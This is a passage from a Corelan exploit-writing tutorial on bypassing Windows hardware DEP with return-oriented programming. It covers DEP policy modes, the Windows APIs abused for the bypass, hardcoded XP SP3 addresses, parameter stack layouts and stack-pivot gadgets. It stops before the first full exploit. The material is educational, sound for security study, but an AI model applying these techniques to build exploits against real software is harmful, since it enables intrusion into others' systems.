●“tfind linespec” - next snapshot collect at line/address
●“tfind end” - leave trace snapshot mode
  
Questions?Peter Van Eeckhoutte's Blog:: [Knowledge is not an object, it ́s a flow] ::HomeLogin/Register/LogoutYour favorite postsArticlesFree ToolsAD & CSAD Disable UsersCertificate List UtilityPVE Find AD UserExchange Transport AgentsAttachment filterAttachment renameNetworkingCisco switch backup utilityNetwork monitoring with powershellTCP PingPVE POP3 CollectorPVE POP3 Collector on the netSecurity Related Toolspvefindaddr Immunity Dbg PyCommandAll downloads on this blogPublic FilesForumsSecurityCorelan Team MembersCorelan Team Security AdvisoriesExploit writing – forumExploit writing tutorialsMetasploitSimple FTP Fuzzer – Metasploit ModuleNessus/Openvas ike-scan wrapperpvefindaddr.py ImmDbg PluginVulnerability Disclosure PolicyShellcode to Javascript encoderLinksTerms of useDonateAbout meAbout meLinkedIn ResumeAbout youCorelan public keysSSL« Offensive Security Hacking Tournament – How strong was my fu ?You are here :Blog > 001_Security > Exploit Writing Tutorials > Exploit writing tutorial part 10 : Chaining DEPwith ROP – the Rubik’s[TM] Cube
 Exploit writing tutorial part 10 : Chaining DEP with ROP –the Rubik’s[TM] CubeJune 16th, 2010 | 
 Author: Peter Van EeckhoutteViewed 131 time(s) | Add this post to Your Favorite Posts | Print This Post | 
This page as PDF (Login first !)
 (1 votes, average: 5.00 out of 5)You need to be a registered member to rate this post.Table of ContentsIntroductionHardware DEP in the Win32 worldBypassing DEP – Building blocksWhat are our options ?The gadgetWindows function calls to bypass DEPChoose your weaponFunction parameters & usage tipsROP Exploit transportabilityFrom EIP to ROPDirect RETSEH basedBefore we beginDirect RET – The ROP version – VirtualProtect()Time to ROP ‘n ROLLHow to build the chain (chaining basics)Finding ROP gadgets"CALL register" gadgetsGotcha. But how/where exactly do I start ?Test before you startEverybody stay cool, this is a ropperyDirect RET – ROP Version 2 – NtSetInformationProcess()Direct RET – ROP Version 3 – SetProcessDEPPolicy()Direct RET – ROP Version 4 – ret-to-libc : WinExec()SEH Based – The ROP version – WriteProcessMemory()Triggering the bugStack pivotingROP NOPBuilding the ROP chain – WriteProcessMemory()Egg huntersScenario 1 : patch the egg hunterScenario 2 : prepend the shellcodeUnicodeASLR and DEP ?The theoryAn exampleOther literature on DEP / Memory protection bypassQuestions ?Thanks to 
IntroductionAbout 3 months after finishing my previous exploit writing related tutorial, I finally found sometime and fresh energy to start writing a new article.In the previous tutorials, I have explained the basics of stack based overflows and how they canlead to arbitrary code execution.  I discussed direct RET overflows, SEH based exploits, Unicode andother character restrictions, the use of debugger plugins to speed up exploit development, how tobypass common memory protection mechanisms and how to write your own shellcode.While the first tutorials were really written to allow people to learn the basics about exploitdevelopment, starting from scratch (basically targeting people who don’t have any knowledge aboutexploit development), you have most likely discovered that the more recent tutorials continue tobuild on those basics and require solid knowledge of asm, creative thinking, and some experiencewith exploit writing in general.Today’s tutorial is no different. I will continue to build upon everything we have seen and learned inthe previous tutorials. This has a couple of consequences :1. You really need to master stack based overflow exploitation techniques (direct RET, SEH,etc). I will assume that you do.2. You need to have *some* asm knowledge. Don’t worry. Even if your knowledge is limited tobeing able to understand what certain instructions do, you’ll probably understand thistutorial. But when you want to build your own rop exploits / apply the rop techniquesyourself, you will need to be able to write asm / recognize asm instructions when you need todo a specific task.  In a way, and to a certain extent, you can compare writing a rop chain withwriting generic shellcode, so I guess that the required level of asm you should have.3. You need to know how to work with Immunity Debugger. Setting breakpoints, steppingthrough instructions, modifying values in registers and on the stack.4. You need to know how the stack works, how data can be put on the stack, taken from thestack, how registers work and how you can interact with registers and the stack in general. This is really necessary before starting to do ROP.5. If you don’t master the basics of stack based exploiting, then this document is not for you. Iwill try to explain and to document all steps as good as I can, but in order to avoid ending upwith an extremely lengthy document, I will have to assume you know how stack basedoverflows work and can be exploited.In article 6 of the tutorial series, I have explained some techniques to bypass memory protectionsystems.   Today, I’ll elaborate more on one of these protection mechanisms, called DEP.  (To bemore specific, I’ll talk about Hardware DEP (NX/XD) and how we can bypass it)As you can read in tutorial 6, there are 2 major kinds of protection mechanisms... First of all, thereare plenty of techniques that can be put in place by the developer (secure coding, stack cookies,safeseh, etc). Most compilers and linkers nowadays enable most of those features by default(except for "secure coding", which is not a feature of course), and that is a good thing. Sadlyenough, there are still a horrible amount of applications out there that are not protected and willrely on other protection mechanisms. And I think you will agree that there are still a lot ofdevelopers who don’t apply secure coding principles to all their code. On top of that (which makesthings even worse), some developers start to rely on OS protection mechanisms (see next), and justdon’t even care about secure coding.That brings us to a second layer of protections, which are part of all recent versions of the Windowsoperating system : ASLR (Address Space Layout Randomization) and DEP (Data ExecutionPrevention).ASLR will randomize stack, heap, module base addresses, making it hard to "predict" (and thushardcode) addresses/memory locations, consequently making it hard(er) for hackers to buildreliable exploits. DEP (I am referring to hardware DEP in this tutorial) will basically prevent code tobe executed on the stack (which is what we have done in all previous tutorials).
The combination of ASLR and DEP have been proven to be quite effective in most cases (but, as youwill learn today, can still be bypassed under certain circumstances). In short, application bugs/buffer overflows won’t auto magically disappear, will probably neverdisappear, and compiler/linker protections are still not applied to all modules, all the time. Thatmeans that ASLR and DEP are our "last resort" layer of defense.  ASLR and DEP are now part of allrecent OS’es, so it’s a natural evolution to see that attacking/bypassing these 2 protectionmechanisms have become significant targets for hackers and researchers.The technique that will be used to bypass DEP in this tutorial is not a new technique. It is very muchbased on the concept of ret-to-libc and was (re)branded to "ROP", short for "Return OrientedProgramming". I already discussed the concept of ret-to-libc in tutorial 6, and in fact, the NtSetInformationProcesstechnique explain in tutorial 6 is an example of ROP. Over the last year/months, new vectors, new ways to use ROP to bypass DEP were documented. What this tutorial does is simply gather all that information and explain how they can be used tobypass DEP on Win32 systems.Before looking at what DEP is, and how to bypass it, there is one very important thing to keep inmind :In all previous tutorials, our shellcode (including alignment code etc) has been placed somewhereon the stack or heap, and we have tried to build reliable ways to jump to that code and execute it.With hardware DEP enabled, you cannot execute a single instruction on the stack.  You can stillpush and pop data onto/from the stack, but you cannot jump to the stack/execute code. Notwithout bypassing/disabling DEP first.Keep that in mind. Hardware DEP in the Win32 worldHardware DEP takes advantage of the NX ("No Execute page protection", AMD specification) or XD("Execute Disable", Intel specification) bit on DEP compatible CPU’s, and will mark certain parts ofthe memory (which should only contain data, such as the default heap, stack, memory pools) asnon-executable. When an attempt is made to execute code from a DEP protected data page, an access violation(STATUS_ACCESS_VIOLATION (0xc0000005)) will occur. In most cases, this will result in processtermination (unhandled exception).  As a result of this, when a developer decided he wants to allowcode to run from a certain memory page, he will have to allocate the memory and mark it asexecutable.Support for hardware DEP was introduced in Windows XP SP2 and Windows Server 2003 SP1 and isnow part of all versions of the Windows operating system since those 2 versions.DEP functions on a per-virtual memory page basis and will change a bit in the PTE (Page TableEntry) to mark the page.In order for the OS to use this feature, the processor must be running in PAE mode (PhysicalAddress Extension).  Luckily, Windows will enable PAE by default.  (64bit systems are "AddressWindowing Extensions" (AWE) aware, so no need to have a separate PAE kernel in 64 bit either)The way DEP manifests itself within the Windows operating system is based on a setting which canbe configured to one of the following values :
OptIn : Only a limited set of Windows system modules/binaries are protected by DEP.OptOut : All programs, processes, services on the Windows system are protected, except forprocesses in the exception listAlwaysOn : All programs, processes, services, etc on the Windows system are protected. NoexceptionsAlwaysOff : DEP is turned off.In addition to those 4 modes, MS implemented a mechanism called "Permanent DEP", which usesSetProcessDEPPolicy(PROCESS_DEP_ENABLE) to make sure processes are DEP enabled.  On Vista (andlater), this "permanent" flag is automatically set for all executables that were linked with the/NXCOMPAT option.  When the flag is set, then changing the DEP policy for that executable *might*only be possible using the SetProcessDEPPolicy technique (see later).You can find more information about SetProcessDEPPolicy here and here The default settings for the various versions of the Windows operating system are :Windows XP SP2, XP SP3, Vista SP0 : OptIn  (XP SP3 has Permanent DEP as well)Windows Vista SP1 : OptIn + AlwaysOn (+ Permanent DEP)Windows 7: OptOut  + AlwaysOn (Permanent DEP)Windows Server 2003 SP1 and up : OptOutWindows Server 2008 and up : OptOut + AlwaysOn (+ Permanent DEP)The DEP behavior on XP and 2003 server can be changed via a boot.ini parameter. Simply add thefollowing parameter to the end of the line that refers to your OS boot configuration :/noexecute=policy (where "policy" can be  OptIn, OptOut, AlwaysOn or AlwaysOff)Under Vista/Windows 2008/Windows 7, you can change the settings using the bcdedit command :bcdedit.exe /set nx OptInbcdedit.exe /set nx OptOutbcdedit.exe /set nx AlwaysOnbcdedit.exe /set nx AlwaysOffYou can get the current status by running "bcdedit" and looking at the nx valueSome links about hardware DEP :http://support.microsoft.com/kb/875352http://en.wikipedia.org/wiki/Data_Execution_Preventionhttp://msdn.microsoft.com/en-us/library/aa366553(VS.85).aspx  Bypassing DEP – Building blocksAs stated in the introduction, when hardware DEP is enabled, you cannot just jump to yourshellcode on the stack, because it would not get executed. Instead, it would trigger an accessviolation and most likely terminate the process.
On top of that, each specific DEP setting (OptIn, OptOut, AlwaysOn, AlwaysOff) and the impact (orabsence) of Permanent DEP will require (or will even dictate) a specific approach and technique.So, what are our options ?Well, since we cannot execute our own code on the stack, the only thing we can do is executeexisting instructions/call existing functions from loaded modules and use data on the stack asparameters to those functions/instructions.These existing functions will provide us with the following options :execute commands (WinExec for example – classic "ret-to-libc")mark the page (stack for example) that contains your shellcode as executable (if that isallowed by the active DEP policy) and jump to itcopy data into executable regions and jump to it. (We *may* have to allocate memory andmark the region as executable first)change the DEP settings for the current process before running shellcodeThe currently active DEP policy and settings will pretty much dictate the technique(s) you have touse to bypass DEP in a certain scenario.A technique which should work all the time is "classic" ret-to-libc.  You should be able to executesimple commands, using existing Windows API calls (such as WinExec), but it will be hard to craft"real" shellcode with this.So we need to look further.  We really need to try to bypass/overrule/change the DEP settings andget our custom shellcode to run.   Luckily, marking pages executable / changing DEP policy settings/ etc  can be done using native Windows OS API’s/function calls.So, is it that simple ?  Yes and no. When we have to bypass DEP, we’ll have to call a Windows API (I’ll go into detail on these WindowsAPI’s a little bit further down the road).The parameters to that API need to be in a register and/or on the stack.  In order to put thoseparameters where they should be, we’ll most likely have to write some custom code.  Think about it. If one of the parameters to a given API function is for example the address of the shellcode, thenyou have to dynamically generate/calculate this address and put it in the right place on the stack.You cannot hardcode it, because that would be very unreliable (or, if the buffer cannot deal withnull bytes and one of the parameters requires null bytes, then you would not be able to hardcodethat value in your buffer). Using some small (shell)code to generate the value would not work either,because... DEP is enabled.Question : How do we get those parameters on the stack ? Answer : With custom code.  Custom code on the stack, however, cannot be executed. DEP would prevent that from happening.Don’t believe me ?  Let’s try with our good old Easy RM to MP3 Convertor exploit from tutorial 1.Without DEP (OptIn)
With DEP (OptOut)
Or, as seen in the debugger (with DEP enabled – OptOut), right when the first instruction of theshellcode would get executed (so directly after the jump esp is made) : Movie
Trust me. Even a simple NOP will not get executed. The gadgetAnyways, back to our "custom code" issue. So if running code from the stack won’t work, we haveto use ROP.In order to run our custom code and eventually execute the Windows API function call, we will needto use existing instructions (instructions in executable areas within the process), and put them insuch an order (and "chain" them together) so they would produce what we need and put data inregisters and/or on the stack.
We need to build a chain of instructions.  We need to jump from one part of the chain to the otherpart of the chain without ever executing a single bit from our DEP protected region.  Or, to use abetter term, we need to return from one instruction to the address of the next instruction (andfinally return to the windows API call when the stack has been set up).Each instruction (series of instructions) in our ROP chain will be called a "gadget".  Each gadget willreturn to the next gadget ( = to the address of the next gadget, placed on the stack), or will call thenext address directly. That way, instruction sequences are chained together.In his original paper, Hovav Shacham used the term "gadget" when referring to higher-level macros/code snippets.  Nowadays, the term "gadget" is often used to refer to asequence of instructions, ending with a ret (which is in fact just a subset of the originaldefinition of a "gadget").  It’s important to understand this subtlety, but at the sametime I’m sure you will forgive me when I use "gadget" in this tutorial to refer to a set ofinstructions ending with a RET.While you are building a ROP based exploit, you’ll discover that the concept of using those gadgetsto building your stack and calling an API can sometimes be compared to solving a Rubik’s [tm] Cube(Thanks Lincoln for the great comparison).  When you try to set a certain register or value on thestack, you may end up changing another one.So there is not generic way to build a ROP exploit and you will find it somewhat frustrating at times.But I can guarantee you that some persistence and perseverance will pay off.That’s the theory. Windows function calls to bypass DEPFirst of all, before you start writing an exploit, you need to determine what your approach will be. What are the possible/available Windows API functions that can be used to bypass DEP in yourcurrent OS / DEP policy ?   Once you have determined that, you can think about setting up yourstack accordingly.These are the most important functions that can help you to bypass/disable DEP :VirtualAlloc(MEM_COMMIT + PAGE_READWRITE_EXECUTE) + copy memory.  This will allowyou to create a new executable memory region, copy your shellcode to it, and execute it. Thistechnique may require you to chain 2 API’s into each other.HeapCreate(HEAP_CREATE_ENABLE_EXECUTE) + HeapAlloc() + copy memory. In essence, thisfunction will provide a very similar technique as VirtualAlloc(), but may require 3 API’s to bechained together))SetProcessDEPPolicy(). This allows you to change the DEP policy for the current process (soyou can execute the shellcode from the stack) (Vista SP1, XP SP3, Server 2008, and only whenDEP Policy is set to OptIn or OptOut)NtSetInformationProcess().  This function will change the DEP policy for the current processso you can execute your shellcode from the stack.VirtualProtect(PAGE_READ_WRITE_EXECUTE). This function will change the accessprotection level of a given memory page, allowing you to mark the location where yourshellcode resides as executable.WriteProcessMemory(). This will allow you to copy your shellcode to another (executable)location, so you can jump to it and execute the shellcode. The target location must bewritable and executable.Each one of those functions requires the stack or registers to be set up in a specific way.  After all,when an API is called, it will assume that the parameters to the function are placed at the top of thestack (= at ESP). That means that your primary goal will be to craft these values on the stack, in ageneric and reliable way, without executing any code from the stack itself.   
At the end (so after crafting the stack), you will most likely end up calling the API.  To make that callwork, ESP must point at the API function parameters.Because we will be using gadgets (pointers to a series of instructions), which are placed on thestack as part of your payload/buffer, and because we are most likely going to return back to thestack all the time (or most of the times), it is very likely that, after building your entire rop chain tocraft the parameters, your final result will *probably* look something like this : junk rop gadgets to craft the stackESP ->function pointer (to one of the WindowsAPI’s) Function parameter Function parameter Function parameter ... Maybe some more rop gadgets nops shellcode more data on the stackRight before the function gets called, ESP points to the Windows API function pointer. That pointeris directly followed by the parameters that are needed for the function. At that time, a simple "RET" instruction will jump to that address. This will call the function and willmake ESP shift with 4 bytes. If all goes well, the top of the stack (ESP) points at the functionparameters, when the function is called. Choose your weaponAPI / OSXPSP2XPSP3VistaSP0VistaSP1Windows7Windows 2003SP1Windows2008VirtualAllocyesyesyesyesyesyesyesHeapCreateyesyesyesyesyesyesyesSetProcessDEPPolicyno (1)yesno (1)yesno (2)no (1)yesNtSetInformationProcessyesyesyesno (2)no (2)yesno (2)VirtualProtectyesyesyesyesyesyesyesWriteProcessMemoryyesyesyesyesyesyesyes
(1) = doesn’t exist(2) = will fail because of default DEP Policy settingsDon’t worry about how to apply these techniques, things will become clear soon. Function parameters & usage tipsAs stated earlier, when you want to use one of the available Windows API’s, you will have to set upthe stack with the correct parameters for that function first.  What follows is a summary of all ofthese functions, their parameters, and some usage tips.VirtualAlloc()This function will allocate new memory. One of the parameters to this function specifies theexecution/access level of the newly allocated memory, so the goal is to set that value toEXECUTE_READWRITE.http://msdn.microsoft.com/en-us/library/aa366887(VS.85).aspxLPVOID WINAPI VirtualAlloc(  __in_opt  LPVOID lpAddress,  __in      SIZE_T dwSize,  __in      DWORD flAllocationType,  __in      DWORD flProtect);This function requires you to set up a stack that contains the following values :Return AddressFunction return address (= address where function needs to return to after it hasfinished). I will talk about this value in a few momentslpAddressStarting address of region to allocate (= new location where you want to allocatememory). Keep in mind that this address might get rounded to the nearestmultiple of the allocation granularity.  You can try to put a provide a hardcodedvalue for this parameterdwSizeSize of the region in bytes. (you will most likely need to generate this value usingrop, unless your exploit can deal with null bytes)flAllocationTypeSet to 0×1000 (MEM_COMMIT). Might need rop to generate & write this value tothe stackflProtectSet to 0×40 (EXECUTE_READWRITE). Might need rop to generate & write this valueto the stackOn XP SP3, this function is located at 0×7C809AF1 (kernel32.dll)When the VirtualAlloc() call was successful, the address where the memory has been allocated, willbe saved into eax.Note : this function will only allocate new memory.  You will have to use a second API call to copythe shellcode into that new region and execute it.  So basically, you need a second rop chain toaccomplish this. (In the table above, I mentioned that the return address parameter needs to pointto the second rop chain. So basically, the return address to VirtualAlloc() needs to point to the ropchain that will copy your shellcode to the newly allocated region and then jump to it)To do this, you can use
memcpy()   (ntdll.dll) – 0×7C901DB3 on XP SP3WriteProcessMemory()  (see later)If you, for example, want to use memcpy(), then you can hook both the VirtualAllocate() andmemcpy() calls together and have them execute directly after each other, using the following setup:First, the pointer to VirtualAlloc() must be at the top of the stack, which is then followed by thefollowing values (parameters) on the stack :pointer to memcpy  (return address field of VirtualAlloc()). When VirtualAlloc ends, it willreturn to this addresslpAddress : arbitrary address (where to allocate new memory. Example 0×00200000)size (how big should new memory allocation be)flAllocationType (0×1000 : MEM_COMMIT)flProtect (0×40 :  PAGE_EXECUTE_READWRITE)Arbitrary address (same address as lpAddress, this param here will used to jump to shellcodeafter memcpy() returns). This field is the first parameter to the memcpy() functionArbitrary address (again, same address as lpAddress. Parameter here will be used asdestination address for memcpy() ). This field is the second parameter to the memcpy()functionAddress of shellcode ( = source parameter for memcpy()). This will be the 3rd parameter tothe memcpy() functionSize : size parameter for memcpy(). This is the last parameter for the memcpy() functionThe key is obviously to find a reliable address (address where to allocate memory) and produce allparameters on the stack using rop.When this chain ends, you will end up executing the code which was copied to the newly allocatedmemory earlier. HeapCreate()http://msdn.microsoft.com/en-us/library/aa366599(VS.85).aspxHANDLE WINAPI HeapCreate(  __in  DWORD flOptions,  __in  SIZE_T dwInitialSize,  __in  SIZE_T dwMaximumSize);This function will create a private heap that can be used in our exploit.  Space will be reserved inthe virtual address space of the process.When the flOptions parameter is set to 0×00040000 (HEAP_CREATE_ENABLE_EXECUTE), then allmemory blocks that are allocated from this heap, will allow for code execution, even if DEP isenabled.Parameter dwInitialSize must contain a value that indicates the initial size of the heap, in bytes. Ifyou set this parameter to 0, then one page will be allocated.The dwMaximumSize parameter refers to the maximum size of the heap, in bytes.This function, will only create a private heap and mark it as executable. You still to allocate memoryin this heap (with HeapAlloc for example) and then copy the shellcode to that heap location (withmemcpy() for example)
When the CreateHeap function returns, a pointer to the newly created heap will be stored in eax.You will need this value to issue a HeapAlloc() call :http://msdn.microsoft.com/en-us/library/aa366597(v=VS.85).aspxLPVOID WINAPI HeapAlloc(  __in  HANDLE hHeap,  __in  DWORD dwFlags,  __in  SIZE_T dwBytes);When new heap memory was allocated, you can use memcpy() to copy your shellcode into theallocated heap and execute it.On XP SP3, HeapCreate is located at 0×7C812C56. HeapAlloc() is located at 7C8090F6. Bothfunctions are part of kernel32.dll SetProcessDEPPolicy()http://msdn.microsoft.com/en-us/library/bb736299(VS.85).aspxWorks for : Windows XP SP3, Vista SP1 and Windows 2008.  In order for this function to work, the current DEP Policy must be set to OptIn or OptOut. If thepolicy is set to AlwaysOn (or AlwaysOff), then SetProcessDEPPolicy will throw an error. If a module islinked with /NXCOMPAT, the technique will not work either.   Finally and equally important, it canonly be called for the process just once.  So if this function has already been called in the currentprocess (IE8 for example, already calls it when the process starts), then it won’t work.Bernardo Damele wrote an excellent blog post about this topic :http://bernardodamele.blogspot.com/2009/12/dep-bypass-with-setprocessdeppolicy.htmlBOOL WINAPI SetProcessDEPPolicy(  __in  DWORD dwFlags);This function requires one parameter, and this parameter must be set to 0 to disable DEP for thecurrent process. In order to use this function in a ROP chain, you need to set up the stack like this :pointer to SetProcessDEPPolicy()pointer to shellcodezeroThe "pointer to shellcode" will make sure the chain will jump to the shellcode when theSetProcessDEPPolicy() was executed.The address of SetProcessDEPPolicy() on XP SP3 is 7C8622A4 (kernel32.dll) NtSetInformationProcess()Works for : Windows XP, Vista SP0, Windows 2003Technique documented by skape and skywing : http://uninformed.org/index.cgi?v=2&a=4
NtSetInformationProcess(   NtCurrentProcess(),    // (HANDLE)-1   ProcessExecuteFlags,   // 0x22   &ExecuteFlags,         // ptr to 0x2   sizeof(ExecuteFlags)); // 0x4Using this function will require you to have 5 parameters on the stack :Return addressValue to be generated, indicates where function needs to return to (=location where your shellcode is placedNtCurrentProcess()Static value, set to 0xFFFFFFFFProcessExecuteFlagsStatic value, set to 0×22&ExecuteFlagsPointer to 0×2 (value can be static, might be dynamic as well). This addresshas to point to a memory location that contains 0×00000002sizeOf(ExecuteFlags)Static value, set to 0×4The NtSetInformationProcess will fail if the permanent DEP flag is set.  On Vista (and later), this flagis set automatically for all executables linked with the /NXCOMPAT linker option.  The techniquewill also fail if the DEP policy mode is set to AlwaysOn.Alternatively, you can also use an existing routine in ntdll (which, in essence, will do the same, andit will have the parameters set up for you automatically).On XP SP3, NtSetInformationProcess() is located at 7C90DC9E (ntdll.dll)As stated earlier, I already explained a possible way to use this technique in tutorial 6, but I willshow another way to use this function in today’s tutorial.  VirtualProtect()http://msdn.microsoft.com/en-us/library/aa366898(VS.85).aspxThe VirtualProtect function changes the access protection of memory in the calling process.BOOL WINAPI VirtualProtect(  __in   LPVOID lpAddress,  __in   SIZE_T dwSize,  __in   DWORD flNewProtect,  __out  PDWORD lpflOldProtect);If you want to use this function, you will have to put 5 parameters on the stack :Returnaddresspointer to the location where VirtualProtect() needs to return to. This will be theaddress of your shellcode on the stack (dynamically created value)lpAddresspointer to the base address of the region of pages whose access protectionattributes need to be changed. In essence, this will be the base address of yourshellcode on the stack (dynamically created value)dwsizenumber of bytes (dynamically created value, making sure the entire shellcode canget executed. If the shellcode will expand for some reason (because of decoding forexample), then those additional bytes will need to be taken into account andaccounted for.
flNewProtectoption that specifies the new protection option : 0×00000040 :PAGE_EXECUTE_READWRITE. If your shellcode will not modify itself (decoder forexample), then a value of 0×00000020 (PAGE_EXECUTE_READ) might work as welllpflOldProtectpointer to variable that will receive the previous access protection valueNote : The memory protection constants that can be used in VirtualProtect() can be found hereOn XP SP3, VirtualProtect() is located at 0×7C801AD4 (kernel32.dll) WriteProcessMemory()http://msdn.microsoft.com/en-us/library/ms681674(VS.85).aspxTechnique documented by Spencer Pratt :http://www.packetstormsecurity.org/papers/general/Windows-DEP-WPM.txtBOOL WINAPI WriteProcessMemory(  __in   HANDLE hProcess,  __in   LPVOID lpBaseAddress,  __in   LPCVOID lpBuffer,  __in   SIZE_T nSize,  __out  SIZE_T *lpNumberOfBytesWritten);This function will allow you to copy your shellcode to another (executable) location so you can jumpto it & execute it. During the copy, WPM() will make sure the destination location is marked aswriteable. You only have to make sure the target destination is executable.This function requires 6 parameters on the stack :return addressAddress where WriteProcessMemory() needs to return to after it finishedhProcessthe handle of the current process. Should be -1 to point to the currentprocess (Static value 0xFFFFFFFF)lpBaseAddresspointer to the location where your shellcode needs to be written to. The"return address" and "lpBaseAddress" will be the same.lpBufferbased address of your shellcode (dynamically generated, address on thestack)nSizenumber of bytes that need to be copied to the destination locationlpNumberOfBytesWrittenwriteable location, where number of bytes will be written toOn XP SP3, WriteProcessMemory() is located at 0×7C802213 (kernel32.dll)One of the nice things about WriteProcessMemory()  (abbreviated to WPM() from this point forward)is the fact that you can use it in 2 ways to gain DEP bypass.* WPM Technique 1 : full WPM() callYou can copy/write your shellcode to an executable location and jump to it. This technique requiresall WPM() parameters to be set up correctly.   A possible example for XP SP3 would be patchingoleaut32.dll (which is loaded in many applications). Oleaut32.dll is most likely not going to be usedin your shellcode, so it would be acceptable to "corrupt" it.The .text section if oleaut32.dll is R E, begins at 0×77121000 and is 7F000 bytes long.
There is a problem with this approach. Since you will be writing to a R+E area, theshellcode will not be able to modify itself. (The WriteProcessMemory call will temporarilymark the location as writeable, but removes the level again.) This means that, if you areusing encoded shellcode (or shellcode that modifies itself), it will not work.  This can bean issue because of bad chars etc.Of course, you could try to prepend the real shellcode with some small shellcode thatwould use virtualprotect() for example, to mark it’s own location as writable.  You canfind an example on how to do this, in the "Egghunter" sectionWe need 2 addresses : one to be used as return address / destination address, and one that will beused as writeable location (where ‘number of bytes written’ will be written to).  So a good examplewould be :return address0×77121010hProcess0xFFFFFFFFlpBaseAddress0×77121010lpBufferto be generatednSizeto be generatedlpNumberOfBytesWritten0×77121004(the lpNumberOfBytesWritten is located before the destination location, to avoid that it wouldcorrupt the shellcode after it was copied to the destination)If you want to use shellcode that uses a decoder, you will have to prepend your shellcode with a callto virtualprotect or so, to mark the current region as writable / executable  (depending on whetheryou are writing to a RE or RW area) before running the encoded shellcode..  * WPM Technique 2 : patch WPM() itselfAlternatively, you can also "patch" the WPM function itself. So basically you would be writing yourshellcode into kernel32.dll, overwriting a part of the WPM function.  This will solve the issue withencoded shellcode (but it has a size limitation as you will see in a few moments)On XP SP3, the WPM function is located at 0×7C802213
Inside the WPM function, a number of CALL’s and jumps are made to actually copy the data(shellcode) from the stack to the destination location  :0×7C802222 : call ntdll.ZwProtectVirtualMemory() : this function call will make sure the targetlocation will become writeable0×7C802271 : call ntdll.ZwWriteVirtualMemory()
0×7C80228B : call ntdll.ZwFlushInstructionCache())0×7C8022C9 : call ntdll.ZwWriteVirtualMemory()After the last function call is made, the data will be copied into the destination location.Then, when the copy itself is made, the function will write the "number of bytes" written and willthen return to the return address specified as a parameter.  This final routine starts at 7C8022CF(so right after the last call to WriteVirtualMemory())So our second option would be to write the shellcode on top of the code that would write the"number of bytes" and would return to the caller. We don’t really need to wait for the code to writethose bytes and return to the call, because all we really want to do is execute the shellcode.Again (and as you can see in the disassembly below), when the WPM function has finished the copyprocess, it returns to 0×7C8022CF. So that might be a good location to use as destination address,because it would sit in the natural flow of the application and would thus get executedautomatically.
This has a few consequences :Parameters : The first (return address) and last parameter (pointer to writeable address forlpNumberOfBytesWritten) are not really important anymore. You can just set the return address to0xFFFFFFFF for example. Although Spencer Pratt stated in his paper that thelpNumberOfBytesWritten can be set to any value (0xDEADBEEF if you will), it appears that thisaddress still needs to point to a writable location to make it work. In addition to that, thedestination address (so where the shellcode must be written into) points inside the WPM functionitself.   On XP SP3, this would be 0×7C8022CFSize : Hot patching the WPM function looks nice, but it might corrupt kernel32.dll if we write toofar.  kernel32.dll might be important for the shellcode itself. It is very likely that your shellcode willuse functions in kernel32.dll.  If you corrupt the kernel32.dll structure, your shellcode may not be
able to run either. So this technique would work for cases where your shellcode size is limited)Example stack layout / function parameters :return address0xFFFFFFFFhProcess0xFFFFFFFFlpBaseAddress0×7C8022CFlpBufferto be generatednSizeto be generatedlpNumberOfBytesWrittenuse a (any) writable location, can bestatic  ROP Exploit transportabilityWhen you start to build ROP exploits, you will most likely end up hard coding the function pointeraddress in your exploit. While there may be ways to avoid doing that, if you do have to hardcodepointers, you already know that your exploit may not work across other versions of the Windowsoperating system.So, if you have hardcoded pointers to windows functions, then it would be ok to use gadgets fromOS dll’s as well. As long as we don’t have to deal with ASLR, then all of that is fine.Trying to build a generic exploit is nice, but let’s be honest – you only need to avoid OS dll’s if youare not hard coding anything from an OS dll.Either way, It might be a good idea to verify if the application uses the function that you want to useto bypass DEP, and see if you can call that functions using an application/module pointer. That way,you can still make the exploit portable, without having to generate the function address, andwithout having to hardcode addresses from an OS dll.A possible way to find out if you can use an API call from within the application or application dll’sis by loading the executable / modules in IDA, and looking at the "Imports" sectionExample : msvcr71.dll on XP SP37C37A08C : HeapCreate()7C37A07C : HeapAlloc()7C37A094 : VirtualAlloc()7C37A140 : VirtualProtect()Note : check out "!pvefindaddr ropcall" , available in pvefindaddr v1.34 and up From EIP to ROPTo make things clear, we’ll start with the basics.Whether DEP is enabled or not, the initial process to overflow a buffer and eventually gain controlover EIP will be exactly the same.  So you either end up with overwriting EIP directly, or you manageto overwrite a SEH record and trigger an access violation so the overwritten SE handler address iscalled.  (There are other ways to get control over EIP, but these are outside the scope of this article)
So far so good, DEP has nothing to do with that.Direct RETIn a typical direct RET exploit, you directly overwrite EIP with an arbitrary value (or, to be moreprecise, EIP gets overwritten when a function epilogue – which uses an overwritten saved EIP – istriggered).  When that happens, you’ll most likely see that you control memory data in the locationwhere ESP points at.  So if it wasn’t for DEP, you would locate a pointer to "jump esp" using yourfavorite tool (!pvefindaddr j esp) and jump to your shellcode. Game over.When DEP is enabled, we cannot do that.  Instead of jumping to ESP (overwriting EIP with a pointerthat would jump to esp), we have to call the first ROP gadget (either directly in EIP or by making EIPreturn to ESP). The gadgets must be set up in a certain way so they would form a chain and onegadget returns to the next gadget without ever executing code directly from the stack.How this can allow us to build a ROP exploit will be discussed later on. SEH basedIn a SEH based exploit, things are a bit different.  You only control the value in EIP when theoverwritten SE Handler is called (by triggering an access violation for example).   In typical SEHbased exploits, you will overwrite SEH with a pointer to pop/pop/ret, which will make you land atnext SEH, and execute the instructions at that location.When DEP is enabled, we cannot do that.  We can call the p/p/r just fine, but when it lands back, itwould start executing code from the stack. And we cannot execute code on the stack, remember ? We have to build a ROP chain, and have that chain bypass/disable the execution prevention systemfirst.  This chain will be placed on the stack (as part of your exploit payload)So in the case of a SEH based exploit, we have to find a way to return to our stack instead of callinga pop pop ret sequence.The easiest way to do so, is by performing a so-called "stack pivot" operation. Instead of using apop pop ret, we’ll just try to get back to a location on the stack where our buffer resides.  You cando this by issuing one of the following instructions :add esp, offset + retmov esp, register + retxchg register,esp + retcall register (if a register points to data you control)Again, how this can initiate our ROP chain, will be discussed below. Before we beginIn Dino Dai Zovi’s awesome paper on ROP, he has visualized the ROP exploit process components(page 39) very well. When building a ROP based exploit, you will need toPivot to the stackUse your gadgets to set up stack/registers (ROP payload)Throw in your regular shellcodeGet the shellcode to execute
(image used with permission of Dino Zai Dovi)We will walk through all of these stages in the next chapters. Direct RET – The ROP version – VirtualProtect()Time to ROP ‘n ROLLLet’s build our first ROP exploit.We will be using Windows XP SP3 Professional, English, with DEP in OptOut mode.
